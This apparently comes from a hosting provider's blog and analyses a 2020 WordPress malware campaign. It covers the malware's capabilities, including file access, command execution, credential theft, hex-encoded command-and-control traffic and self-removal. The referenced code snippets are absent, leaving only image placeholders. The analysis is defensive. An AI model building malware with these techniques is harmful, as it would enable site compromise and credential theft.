• Tuesday, May 26, 2020

Web sites running WordPress are like catnip for hackers. Among the millions of WordPress users are many with weak login credentials, which are exploited to launch malware campaigns. 

We first detected it on 13 April, and since then we’ve seen it blocked by Imunify over 300,000 times. In the past month, this campaign has compromised thousands of unprotected WordPress-based web sites. 

Let’s analyze this new WordPress malware campaign to see what makes it dangerous to web sites running WordPress. 

What Makes It Dangerous

  1. Files can be read and written.

    In this malware campaign, the attacker uses the following malicious code block to read any arbitrary file on the compromised web server:


    This part of the code helps the attacker upload or write to a file...

    unnamed (5)-1

    ... that’s used to drop more malware into compromised website later:


  2. Plugins can be activated/deactivated.

    Now that the attacker controls the web site, he can activate and deactivate its WordPress plugins using the following malware code: 


  3. Malware can be dropped into the WP folders.

    The malicious code fetches an updated version of the malware from a Command & Control server, and drops it in the WordPress folders.

    This updated version of itself generates random file names every time it’s fetched…

    unnamed (9)-1


    ...and drops it into various locations, including the /wp-contents/uploads/ folder:

    unnamed (12)

    It can also drop its payload in other folders, such as wp-includes, wp-admin, wp-content/themes and wp-content/plugins.

  4. Theme files can be modified.

    The malware also modifies WordPress theme files to drop references to malware code that was previously dropped:


  5. System-level commands can be executed.

    The following piece of code takes system-level OS command input, and processes it through the php functions exec and shell_exec: 


  6. Wordpress credentials are harvested.

    WordPress user credentials are harvested, then sent to the C&C server at: 

    unnamed (13)

    These credentials could be used at a later phase by the attacker, to reinfect the site if the malware is removed.

    unnamed (14) 

How It Protects Itself

This malware isn’t just written to infiltrate the server and exfiltrate data, it also includes mechanisms for evasion and protection to keep it from being discovered and shutted down.

These mechanisms include: 

  1. Encoded communication

    This malware encodes all sorts of information shared back and forth between the C&C server and the hacked site. It does this with hexadecimally encoded binary strings, through the use of the hex2bin php function:

    unnamed (15)

    Here the $cmd variable, which can hold the OS command to be executed, is passed through the hex2bin function that decodes the encoded string.

  2. Base URL obfuscation

    The base URL of the C&C server is also encoded in the malware code, with a hexadecimally encoded binary string that decodes to


    unnamed (16)

  3. Communication authorization

    The malware authorizes itself with the C&C server before establishing communication, using an MD5 token that varies from site to site: 


  4. Self-destruct capability

    The malware also has the ability to remove itself from the WordPress files it has infected. It uses the unspread function to do that:


Detecting And Cleaning This Malware

If you’re hosting your site with Browser Daily we use Imunify360 to detect and remove this for you.

Powered by WHMCompleteSolution